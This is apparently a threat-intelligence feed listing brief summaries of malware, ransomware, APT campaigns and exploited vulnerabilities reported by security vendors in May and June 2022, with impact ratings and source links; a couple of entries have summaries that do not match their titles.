- Jasmin_ransomware_tool_rebranded_as_GoodWill_ransomware
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Netskope Threat Labs have analysed a few GoodWill ransomware samples and found that this threat is 100% based on an open-source ransomware named Jasmin, a red team tool that can be used to simulate real ransomware attacks.
Source:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Jasmin%20Ransomware/IOCs
—
- Intel Source:
- Trend Micro
- Intel Name:
- YourCyanide_Ransomware_Propagates_With_PasteBin_Discord_Microsoft_Links
- Date of Scan:
- 2022-06-06
- Impact:
- LOW
- Summary:
- The Trend Micro Threat Hunting team recently analyzed a series of CMD-based ransomware variants with a number of capabilities, such as stealing user information, bypassing remote desktop connections, and propagating through email and physical drives.
Source:
https://www.trendmicro.com/en_us/research/22/f/yourcyanide-a-cmd-based-ransomware.html
—
- Intel Source:
- SecureList
- Intel Name:
- WinDealer_malware_shows_extremely_sophisticated_network_abilities
- Date of Scan:
- 2022-06-06
- Impact:
- LOW
- Summary:
- Researchers have discovered that the malware known as WinDealer, spread by Chinese-speaking Advanced Persistent Threat (APT) actor LuoYu, has the ability to perform intrusions through a man-on-the-side attack.
Source:
https://securelist.com/windealer-dealing-on-the-side/105946/
—
- Intel Source:
- Symantec
- Intel Name:
- Clipminer_Botnet
- Date of Scan:
- 2022-06-06
- Impact:
- LOW
- Summary:
- Threat analysts have discovered a large operation of a new cryptocurrency mining malware called Clipminer that brought its operators at least $1.7 million from transaction hijacking.
—
- Intel Source:
- Trend Micro
- Intel Name:
- DeadBolt_Ransomware
- Date of Scan:
- 2022-06-06
- Impact:
- MEDIUM
- Summary:
- The DeadBolt ransomware kicked off 2022 with a slew of attacks that targeted internet-facing Network-Attached Storage (NAS) devices.
—
- Intel Source:
- Sucuri
- Intel Name:
- Massive_NDSW_NDSX_Malware_Campaign
- Date of Scan:
- 2022-06-05
- Impact:
- MEDIUM
- Summary:
- Researchers at Sucuri have been tracking a campaign since February 2019 which they call the ndsw/ndsx malware campaign. The malware consists of several layers: the first prominently features the ndsw variable within JavaScript injections, and the second leverages the ndsx variable in the payload.
Source:
https://blog.sucuri.net/2022/06/analysis-massive-ndsw-ndsx-malware-campaign.html
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cobalt_Strike_Beacon_and_other_vulnerabilities_leveraged_to_target_Ukraine_government_bodies
- Date of Scan:
- 2022-06-03
- Impact:
- LOW
- Summary:
- CERT-UA has analysed a phishing email targeting Ukrainian government bodies that carries a file named “changes in wages with accruals.docx”. The file contains a link to an external HTML object which, when executed, exploits the vulnerabilities CVE-2021-40444 and CVE-2022-30190 and then compromises the system with Cobalt Strike.
—
- Intel Source:
- Jstnk
- Intel Name:
- AsyncRAT_targeting_Colombian_Organisations
- Date of Scan:
- 2022-06-03
- Impact:
- LOW
- Summary:
- Researcher Jose Luis Sánchez Martínez has analysed campaigns related to AsyncRAT targeting Colombia, in which there are some modifications to the TTPs.
Source:
https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/#summary
—
- Intel Source:
- Volexity
- Intel Name:
- Zero_Day_Exploitation_of_Atlassian_Confluence
- Date of Scan:
- 2022-06-03
- Impact:
- HIGH
- Summary:
- Hackers are actively exploiting a new Atlassian Confluence zero-day vulnerability tracked as CVE-2022-26134 to install web shells, with no fix available at this time.
—
- Intel Source:
- Microsoft
- Intel Name:
- POLONIUM_targeting_Israeli_organizations
- Date of Scan:
- 2022-06-03
- Impact:
- LOW
- Summary:
- POLONIUM has targeted, and may have compromised, more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months.
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC2165_Shifts_to_LOCKBIT_to_Evade_Sanctions
- Date of Scan:
- 2022-06-03
- Impact:
- MEDIUM
- Summary:
- Mandiant has investigated multiple LOCKBIT ransomware intrusions attributed to UNC2165, a financially motivated threat cluster that shares numerous overlaps with the threat group publicly reported as “Evil Corp”.
Source:
https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions
—
- Intel Source:
- ISC.SANS
Cisco Talos
Recorded Future
Fortinet
- Intel Name:
- Follina_zero-day_vulnerability_in_Microsoft_Office_getting_exploited
- Date of Scan:
- 2022-06-02
- Impact:
- HIGH
- Summary:
- A recently discovered zero-day vulnerability, CVE-2022-30190, in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. The vulnerability, also known as “Follina,” exists when MSDT is called using the URL protocol from an application such as Microsoft Office or Microsoft Word, or via an RTF file. It has been widely exploited in the wild by threat actors, and some of that activity has been attributed to a Chinese threat actor.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Yashma_Ransomware_Report_CYFIRMA
- Date of Scan:
- 2022-06-02
- Impact:
- MEDIUM
- Summary:
- Yashma is a new ransomware seen in the wild since May 2022. This ransomware is the rebranded version of an earlier ransomware named Chaos.
Source:
https://www.cyfirma.com/outofband/yashma-ransomware-report/
—
- Intel Source:
- Zscaler
- Intel Name:
- BITB_attack_impersonating_Indian_government_website
- Date of Scan:
- 2022-06-02
- Impact:
- LOW
- Summary:
- The Zscaler ThreatLabz team recently observed a new Browser-in-the-Browser (BITB) attack impersonating an Indian government website to deliver a sextortion demand, with the threat of releasing sensitive information about victims if they refuse to pay.
—
- Intel Source:
- ASEC
- Intel Name:
- NSIS_Installer_Malware_Included_with_Various_Malicious_Files
- Date of Scan:
- 2022-06-02
- Impact:
- LOW
- Summary:
- The ASEC analysis team recently discovered attackers distributing multiple malicious files with NSIS installers.
—
- Intel Source:
- CISA
- Intel Name:
- Karakurt_Data_Extortion_Group
- Date of Scan:
- 2022-06-01
- Impact:
- MEDIUM
- Summary:
- Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom. Known ransom demands have ranged from $25,000 to $13,000,000 in Bitcoin, with payment deadlines typically set to expire within a week of first contact with the victim.
—
- Intel Source:
- Checkpoint
- Intel Name:
- XLoader_Botnet_new_C&C_Infrastructure
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point Research have identified the real C&C servers among thousands of legitimate domains used by the XLoader botnet.
Source:
https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/
—
- Intel Source:
- Cyble
- Intel Name:
- CVE_2022_30190_Microsoft_Support_Diagnostic_Tool_(MSDT)_RCE_Vulnerability
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Recently, Microsoft discussed a new Zero-Day vulnerability (CVE-2022-30190) that affects Microsoft Support Diagnostic Tool (MSDT) and allows the attackers to execute arbitrary code by exploiting it.
Source:
https://blog.cyble.com/2022/05/31/new-zero-day-exploit-spotted-in-the-wild/
—
- Intel Source:
- 360 Threat Intelligence Center
- Intel Name:
- APTC53_or_Gamaredon_new_DDoS_Attack_mission
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- 360 Security Brain has detected more frequent network attacks related to the APT-C-53/Gamaredon group. The group has begun to release the open source DDoS trojan program “LOIC” to carry out DDoS attacks.
—
- Intel Source:
- Trend Micro
- Intel Name:
- WSO2_Vulnerability_exploited_to_install_Linux_compatible_CobaltStrike_Beacons
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Researchers at Trend Micro have observed attackers exploiting a WSO2 vulnerability and initiating an outbound connection to a malicious Cobalt Strike callback destination and command-and-control (C&C) server IP address.
—
- Intel Source:
- AT&T Alien Labs
- Intel Name:
- EnemyBot_targeting_Content_Management_System_servers_and_Android_devices
- Date of Scan:
- 2022-05-31
- Impact:
- MEDIUM
- Summary:
- Researchers at AT&T Alien Labs have identified that EnemyBot is expanding its capabilities, exploiting vulnerabilities from 2022, and now targeting IoT devices, web servers, Android devices and content management system (CMS) servers.
—
- Intel Source:
- ASEC
- Intel Name:
- XXL_Malware_distributed_through_Email
- Date of Scan:
- 2022-05-30
- Impact:
- LOW
- Summary:
- XXL Malware distributed through Email
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC_Part_II
- Date of Scan:
- 2022-05-30
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet’s FortiGuard Labs have shared part two of their analysis of a phishing campaign that delivers three fileless malware families onto a victim’s device. Once executed, the malware is able to steal sensitive information from that device. It mainly affects Microsoft Windows users.
Source:
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware-part-two
—
- Intel Source:
- 360 Total Security
- Intel Name:
- Magniber_ransomware_targeting_Windows11_users
- Date of Scan:
- 2022-05-28
- Impact:
- MEDIUM
- Summary:
- Researchers at 360 Total Security have detected a new attack on Windows 11 users, in which Magniber ransomware is disguised as a Windows 10 upgrade patch package and spread widely.
—
- Intel Source:
- Inquest
- Intel Name:
- Tandem_Espionage_Campaign
- Date of Scan:
- 2022-05-27
- Impact:
- LOW
- Summary:
- Researcher Dmitry Melikov at InQuest has discovered an interesting campaign distributing malicious documents, which used a download chain as well as legitimate payload-hosting services.
Source:
https://inquest.net/blog/2022/05/25/tandem-espionage
—
- Intel Source:
- CloudSEK
- Intel Name:
- GoodWill_Ransomware
- Date of Scan:
- 2022-05-27
- Impact:
- MEDIUM
- Summary:
- Researchers at CloudSEK have analysed the activity of the GoodWill ransomware group, which forces victims to donate to the poor and provide financial assistance to patients in need.
—
- Intel Source:
- IBM Security X-Force
- Intel Name:
- Analysis_of_Black_Basta_Ransomware
- Date of Scan:
- 2022-05-27
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM documented a technical analysis of Black Basta ransomware and provided IoCs. Black Basta first appeared in April 2022.
Source:
https://securityintelligence.com/posts/black-basta-ransomware-group-besting-network/
—
- Intel Source:
- Trustwave
- Intel Name:
- Grandoreiro_Banking_Malware
- Date of Scan:
- 2022-05-27
- Impact:
- MEDIUM
- Summary:
- Researchers from Trustwave SpiderLabs have identified a Grandoreiro malware campaign targeting bank users in Brazil, Spain, and Mexico. The campaign exploits the tax season in the target countries by sending out tax-themed phishing emails.
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Mirai_malware_variants_doubled_for_Intel_powered_Linux_systems
- Date of Scan:
- 2022-05-26
- Impact:
- MEDIUM
- Summary:
- According to CrowdStrike research, Mirai malware variants compiled for Intel-powered Linux systems doubled (up 101%) in Q1 2022 compared to Q1 2021.
Source:
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips/
—
- Intel Source:
- XJunior
- Intel Name:
- Deep_Analysis_on_new_version_of_Mars_Stealer_Malware
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- Security researcher Mohamed Ashraf has analysed a new version (V8) of the Mars Stealer malware. The analysis identified anti-analysis techniques, a different encryption algorithm, a new anti-debug technique, and that the external DLLs are now packed in a single zip file.
Source:
https://x-junior.github.io/malware%20analysis/MarsStealer/#iocs
—
- Intel Source:
- TeamCymru
- Intel Name:
- Threat_actors_using_Browser_automation_framework
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- Researchers from Team Cymru have noticed, and alerted about, a free-to-use browser automation framework that is increasingly being used by threat actors as part of their attack campaigns.
Source:
https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/
—
- Intel Source:
- Sekoia
- Intel Name:
- TURLA_new_phishing_based_reconnaissance_campaign
- Date of Scan:
- 2022-05-26
- Impact:
- LOW
- Summary:
- The Sekoia Threat & Detection Team has exposed a reconnaissance and espionage campaign by the Turla intrusion set against the Baltic Defense College, the Austrian Economic Chamber (which has a role in government decision-making such as economic sanctions), and NATO’s eLearning platform JADL, pointing to Russian intelligence interest in the defense sector in Eastern Europe.
Source:
https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/
—
- Intel Source:
- WalMart
- Intel Name:
- SocGholish_Campaigns_and_Initial_Access_Kit
- Date of Scan:
- 2022-05-26
- Impact:
- MEDIUM
- Summary:
- Researchers from Walmart found that SocGholish has been one of the prominent initial access vectors for threat actors and has also partnered with Evil Corp.
Source:
https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee
—
- Intel Source:
- BlackBerry
- Intel Name:
- Yashma_Latest_version_of_Chaos_Ransomware
- Date of Scan:
- 2022-05-25
- Impact:
- Medium
- Summary:
- The BlackBerry Research and Intelligence Team has discovered details of the latest version of the Chaos ransomware line, dubbed Yashma. Though the Chaos ransomware builder has only been in the wild for a year, Yashma claims to be the sixth version (v6.0) of this malware.
Source:
https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree
—
- Intel Source:
- Cyble
- Intel Name:
- Threat_Actor_leverage_Fake_Proof_Of_Concept_to_deliver_CobaltStrike
- Date of Scan:
- 2022-05-25
- Impact:
- LOW
- Summary:
- A threat actor targeted security researchers with fake Windows proof-of-concept exploits that infected devices with the Cobalt Strike backdoor.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_variant_of_Nokoyawa_Ransomware
- Date of Scan:
- 2022-05-25
- Impact:
- Medium
- Summary:
- Researchers at Fortinet have found that Nokoyawa ransomware is a new variant of the Nemty ransomware, and that it continues to improve.
Source:
https://www.fortinet.com/blog/threat-research/nokoyawa-variant-catching-up
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Unknown_APT_group_targeted_Russia_repeatedly
- Date of Scan:
- 2022-05-25
- Impact:
- Low
- Summary:
- Researchers from the Malwarebytes Threat Intelligence Team discovered campaigns by unknown threat actors targeting Russia. The APT group has launched at least four campaigns since late February.
—
- Intel Source:
- Fortinet
- Intel Name:
- Spoofed_Purchase_Order_drops_GuLoader_Malware
- Date of Scan:
- 2022-05-25
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet have analysed a phishing email purporting to be a purchase order from an oil provider in Saudi Arabia; the partial PDF image displayed in the body of the email was actually a link to an ISO file hosted in the cloud that contained an executable for GuLoader.
Source:
https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader
—
- Intel Source:
- Microsoft
- Intel Name:
- Web_Skimmers_mimicking_Google_Analytics_and_Meta_Pixel_Code
- Date of Scan:
- 2022-05-25
- Impact:
- MEDIUM
- Summary:
- Threat actors behind web skimming campaigns are leveraging malicious JavaScript code that mimics Google Analytics and Meta Pixel scripts in an attempt to sidestep detection.
—
- Intel Source:
- Sonatype
- Intel Name:
- New_pymafka_malicious_package_drops_CobaltStrike_on_macOS_Windows_Linux
- Date of Scan:
- 2022-05-24
- Impact:
- Low
- Summary:
- Sonatype’s automated malware detection bots have discovered a malicious Python package, ‘pymafka’, in the PyPI registry. PyMafka drops Cobalt Strike on Windows, macOS and Linux. The package name is nearly identical to the popular PyKafka, and it appears to typosquat that legitimate library, a programmer-friendly Apache Kafka client for Python.
Source:
https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux
—
- Intel Source:
- Checkpoint
- Intel Name:
- Twisted_Panda_Espionage_Operation
- Date of Scan:
- 2022-05-24
- Impact:
- Medium
- Summary:
- The Check Point Research team has detailed a targeted campaign that has been using sanctions-related baits to attack Russian defense institutes that are part of the Rostec Corporation. The investigation shows that this campaign is part of a larger Chinese espionage operation that has been ongoing against Russian-related entities for several months.
—
- Intel Source:
- HP Wolf Security
- Intel Name:
- PDF_delivering_Snake_Keylogger_Malware
- Date of Scan:
- 2022-05-24
- Impact:
- Medium
- Summary:
- HP Wolf Security Researchers have discovered a recent malware distribution campaign using PDF attachments to smuggle malicious Word documents that infect users with malware.
Source:
https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/#
—
- Intel Source:
- Cofense
- Intel Name:
- Hackers_utilize_SwissTransfer_to_deploy_Phishing_Scam
- Date of Scan:
- 2022-05-24
- Impact:
- Low
- Summary:
- Recently the Cofense Phishing Defence Center noticed a number of emails using the SwissTransfer service to achieve successful phishes against recipients. File sharing services such as WeTransfer, Microsoft OneDrive and Dropbox have been used as an attack vector to spread files containing anything from scams to malware leading to ransomware.
Source:
https://cofense.com/blog/hackers-utilize-swisstransfer-to-deploy-phishing-scam
—
- Intel Source:
- ASEC
- Intel Name:
- Emotet getting distributed through Link Files
- Date of Scan:
- 2022-05-23
- Impact:
- Low
- Summary:
- ASEC researchers recently discovered Emotet getting distributed through various files including Link Files.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Supply_Chain_Attack_targets_GitLab_CI_Pipelines
- Date of Scan:
- 2022-05-23
- Impact:
- Medium
- Summary:
- Researchers from SentinelLabs identified a software supply chain attack targeting Rust developers with malware aimed directly at infecting GitLab Continuous Integration (CI) pipelines. The campaign has been dubbed CrateDepression.
—
- Intel Source:
- Microsoft
- Intel Name:
- XorDdos_targeting_Linux_devices
- Date of Scan:
- 2022-05-23
- Impact:
- Medium
- Summary:
- Microsoft researchers saw a 254% increase in activity of a stealthy and modular malware that is used to hack into Linux devices and build a DDoS botnet. The malware is called XorDdos.
—
- Intel Source:
- Zscaler
- Intel Name:
- Vidar_Malware_distributed_through_fake_Windows11_downloads
- Date of Scan:
- 2022-05-23
- Impact:
- Low
- Summary:
- Researchers from Zscaler came across fraudulent domains masquerading as Microsoft’s Windows 11 download portal, which attempt to trick users into running trojanized installation files that infect systems with the Vidar information stealer.
—
- Intel Source:
- Asec
- Intel Name:
- Lazarus_Group_Exploiting_Log4Shell_Vulnerability
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Researchers from ASEC discovered the Lazarus group distributing NukeSped by exploiting the Log4Shell vulnerability. The threat actor used the log4j vulnerability against VMware Horizon products to which the security patch had not been applied.
—
- Intel Source:
- PtSecurity
- Intel Name:
- Chinese_Threat_group_Space_Pirates_targets_Russian_Aerospace_Firms
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Analysts at Positive Technologies came across a previously unknown Chinese hacking group that targets enterprises in the Russian aerospace industry with phishing emails to install novel malware on their systems. They have dubbed the threat actor ‘Space Pirates’.
—
- Intel Source:
- Security Intelligence
- Intel Name:
- All_about_ITG23_Crypters
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- IBM X-Force researchers analyzed thirteen crypters that have all been used with malware built or operated by ITG23 internal teams or third-party distributors — including Trickbot, BazarLoader, Conti, and Colibri.
Source:
https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- BumbleBee_Malware_getting_delivered_via_TransferXL_Urls
- Date of Scan:
- 2022-05-20
- Impact:
- Low
- Summary:
- Researchers at ISC.SANS were able to relate Bumblebee malware with EXOTIC LILY threat actor, as they saw usage of active TransferXL URLs delivering ISO files for Bumblebee malware.
—
- Intel Source:
- CISA
- Intel Name:
- Threat_Actors_exploiting_VMware_vulnerability
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- CISA released an advisory to warn organizations about threat actors exploiting unpatched VMware vulnerabilities. These vulnerabilities affect certain versions of VMware Workspace ONE Access, VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
—
- Intel Source:
- WeiXin
- Intel Name:
- Latest_APT_C_24_SideWinder_Rattlesnake_attack_activity
- Date of Scan:
- 2022-05-20
- Impact:
- Medium
- Summary:
- Researchers from 360 Threat Intelligence Center came across attack activity launched by APT-C-24/SideWinder in which the threat actor has adopted new TTPs.
—
- Intel Source:
- Barracuda
- Intel Name:
- VMware_Bugs_Abused_to_Deliver_Mirai
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Barracuda discovered attempts to exploit the recent vulnerabilities CVE-2022-22954 and CVE-2022-22960. Mirai was being delivered by abusing these VMware bugs.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Threat Actors targets US Business Online Checkout Page
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Palo Alto Networks documented the background of Emotet and its activity from November 2021 through January 2022.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Emotet_The_journey
- Date of Scan:
- 2022-05-19
- Impact:
- Medium
- Summary:
- Researchers from Palo Alto Networks documented the background of Emotet and its activity from November 2021 through January 2022.
Source:
https://unit42.paloaltonetworks.com/emotet-malware-summary-epoch-4-5/
—
- Intel Source:
- Sucuri
- Intel Name:
- X_Cart_Skimmer_with_DOM_based_Obfuscation
- Date of Scan:
- 2022-05-18
- Impact:
- Low
- Summary:
- A security researcher from Sucuri worked on an infected X-Cart website and found two interesting credit card stealers there — one skimmer located server-side, the other client-side.
Source:
https://blog.sucuri.net/2022/05/x-cart-skimmer-with-dom-based-obfuscation.html
—
- Intel Source:
- Trend Micro
- Intel Name:
- RansomEXX_and_its_TTPs
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from Trend Micro shed light on the tactics and techniques of the ransomware variant called RansomEXX, which has been active since 2020.
—
- Intel Source:
- Prodaft
- Intel Name:
- Wizard_Spider_Group_In_Depth_Analysis
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from PRODAFT published the results of an investigation into Wizard Spider, believed to either be or be associated with the Grim Spider and Lunar Spider hacking groups.
Source:
https://www.prodaft.com/resource/detail/ws-wizard-spider-group-depth-analysis
—
- Intel Source:
- NTT Security
- Intel Name:
- Operation RestyLink targeting Japanese Firms
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- Researchers from NTT Security observed an APT campaign targeting Japanese companies starting in mid-April 2022. The initial attack vector in this campaign was spear-phishing email.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Uncovering_Kingminer_Botnet_Attack
- Date of Scan:
- 2022-05-18
- Impact:
- Low
- Summary:
- Researchers from Trend Micro detail the TTPs of the Kingminer botnet. In 2020, threat actors deployed Kingminer to target SQL servers for cryptocurrency mining.
—
- Intel Source:
- Fortinet
- Intel Name:
- Chaos_Ransomware_stands_with_Russia
- Date of Scan:
- 2022-05-18
- Impact:
- Medium
- Summary:
- FortiGuard Labs came across a variant of the Chaos ransomware that appears to side with Russia. This variant of the ransomware has been leveraging the Russia-Ukraine conflict.
Source:
https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia
—
- Intel Source:
- Jamf
- Intel Name:
- UpdateAgent_Returns_with_New_macOS_Malware_Dropper
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Jamf Threat Labs came across a new variant of the macOS malware tracked as UpdateAgent. The malware relies on the AWS infrastructure to host its various payloads and perform its infection status updates to the server.
—
- Intel Source:
- CERT-UA
- Intel Name:
- UN_social_program_themed_online_fraud
- Date of Scan:
- 2022-05-17
- Impact:
- Medium
- Summary:
- CERT-UA researchers recently responded to the discovery of a fraudulent Facebook page that mimics the TV channel “TSN”.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Malicious_HTML_Help_File_Delivering_Agent_Tesla
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Unit 42 researchers observed an attack utilizing malicious compiled HTML help files for the initial delivery. The method was used to deliver Agent Tesla.
Source:
https://unit42.paloaltonetworks.com/malicious-compiled-html-help-file-agent-tesla/
—
- Intel Source:
- MalwareBytes
- Intel Name:
- Custom_PowerShell_RAT_targets_Germans
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Malwarebytes came across a new campaign that plays on current concerns by luring Germans with a promise of updates on the threat situation in Ukraine, and then infects the victims with a RAT.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Onyx_Ransomware
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- Researchers from Cyfirma analyzed samples of a new ransomware called Onyx which was first seen in April 2022. This ransomware encrypts files and then modifies their filenames by appending the .ampkcz extension.
Source:
https://www.cyfirma.com/outofband/onyx-ransomware-report/
—
- Intel Source:
- JPCERT
- Intel Name:
- Analysis_of_the_HUI_Loader
- Date of Scan:
- 2022-05-17
- Impact:
- Low
- Summary:
- JPCERT researchers shared their analysis of the HUI Loader, which has been used by multiple attack groups, including APT10, since around 2015.
Source:
https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html
—
- Intel Source:
- Uptycs
- Intel Name:
- KurayStealer_Malware
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers at Uptycs came across a new malware builder dubbed KurayStealer that has password-stealing and screenshot capabilities. The malware harvests passwords and screenshots and sends them to the attackers’ Discord channel via webhooks.
Source:
https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks
—
- Intel Source:
- CrowdStrike
- Intel Name:
- Novel IceApple Post-Exploitation Framework
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers from CrowdStrike found a new post-exploitation framework being deployed on Microsoft Exchange servers. The threat has been dubbed IceApple.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- From_0_Day_to_Mirai
- Date of Scan:
- 2022-05-16
- Impact:
- High
- Summary:
- Researchers at ISC.SANS found attacks exploiting the recent high severity vulnerability in F5 products and were able to attribute the attacks to Mirai.
—
- Intel Source:
- Cluster25
- Intel Name:
- APT29_Abusing_Legitimate_Software_For_Targeted_Operations_In_Europe
- Date of Scan:
- 2022-05-16
- Impact:
- Medium
- Summary:
- Cluster25 researchers analyzed several spear-phishing campaigns linked to APT29 that involve the use of a side-loaded DLL through signed software (like the Adobe suite) and legitimate web services (like Dropbox) as a communication vector for Command and Control (C&C).
Source:
https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/
—
- Intel Source:
- Cyble
- Intel Name:
- Telegram_used_to_spread_Eternity_Malware
- Date of Scan:
- 2022-05-16
- Impact:
- Low
- Summary:
- Researchers from Cyble came across a new malware service, dubbed the Eternity Project by the threat actors behind it, which allows cybercriminals to target potential victims with a customized threat offering based on individual modules.
Source:
https://blog.cyble.com/2022/05/12/a-closer-look-at-eternity-malware/
—
- Intel Source:
- Cybereason
- Intel Name:
- Quantum_Locker_Ransomware
- Date of Scan:
- 2022-05-16
- Impact:
- Medium
- Summary:
- Researchers at Cybereason analyzed Quantum Locker ransomware and demonstrated its detection and prevention. The initial infection method used by the operators is the infamous IcedID malware.
Source:
https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware
—
- Intel Source:
- NetSkope
- Intel Name:
- RedLine_Stealer_Campaign_spread_via_Github_hosted_payload
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- Researchers at Netskope Threat Labs have discovered a new RedLine Stealer campaign spread on YouTube, using a fake bot for buying Mystery Box NFTs from Binance. The video description leads the victim to download the fake bot, which is hosted on GitHub.
—
- Intel Source:
- MalwareBytes
- Intel Name:
- APT34_targets_Jordan_Government_using_new_Saitama_backdoor
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- Researchers at Malwarebytes identified a suspicious email on April 26 targeting a government official at Jordan’s foreign ministry. It contained a malicious Excel document that delivered Saitama, a new hacking tool used to provide a backdoor into systems. Malwarebytes attributed the email to the threat group commonly known as APT34.
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_campaign_delivering_AveMariaRAT_BitRAT_PandoraHVNC
- Date of Scan:
- 2022-05-13
- Impact:
- Low
- Summary:
- Researchers at Fortinet’s FortiGuard Labs have analysed a phishing campaign that delivered three fileless malware families onto a victim’s device. Once executed, the malware is able to steal sensitive information from that device. It mainly affects Microsoft Windows users.
Source:
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
—
- Intel Source:
- SecureWorks
- Intel Name:
- Iranian_threat_actor_COBALT_MIRAGE_conducting_Ransomware_operations_in_US
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- SecureWorks Counter Threat Unit has analysed REvil ransomware samples that indicate GOLD SOUTHFIELD has resumed operations. The identification of multiple samples containing different modifications and the lack of an official new version indicate that REvil is under active development.
Source:
https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC_0010_Armageddon_leveraging_GammaLoad_PS1_v2_malware
- Date of Scan:
- 2022-05-13
- Impact:
- Medium
- Summary:
- CERT-UA has analysed a phishing campaign with the subject “On revenge in Kherson!” carrying an attachment in the form of a file named “Plan Kherson.htm”. The campaign uses the malicious program GammaLoad.PS1_v2 and is attributed to the group UAC-0010 (Armageddon).
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Bitter APT expands its target list
- Date of Scan:
- 2022-05-12
- Impact:
- Medium
- Summary:
- An espionage-focused threat actor (Bitter APT) known for targeting China, Pakistan, and Saudi Arabia has added Bangladeshi government organizations to an ongoing campaign.
Source:
https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html
—
- Intel Source:
- Proofpoint
- Intel Name:
- Nerbian_RAT_targeting_firms_in_Italy_Spain_and_UK
- Date of Scan:
- 2022-05-12
- Impact:
- Low
- Summary:
- Proofpoint researchers found a previously undocumented remote access trojan (RAT) called Nerbian RAT, written in the Go programming language, that has been disproportionately targeting entities in Italy, Spain, and the U.K.
—
- Intel Source:
- Palo Alto
- Intel Name:
- Critical_F5_BIG_IP_Vulnerability_New_IoCs
- Date of Scan:
- 2022-05-12
- Impact:
- High
- Summary:
- Researchers from Palo Alto have released a few indicators of compromise along with their analysis of the critical F5 BIG-IP vulnerability.
—
- Intel Source:
- JFrog
- Intel Name:
- Malicious_NPM_Packages_targets_German_Companies
- Date of Scan:
- 2022-05-12
- Impact:
- Low
- Summary:
- Researchers from JFrog have discovered a number of malicious packages in the NPM registry specifically targeting several prominent companies based in Germany to carry out supply chain attacks.
Source:
https://jfrog.com/blog/npm-supply-chain-attack-targets-german-based-companies/
—
- Intel Source:
- ISC.SANS
- Intel Name:
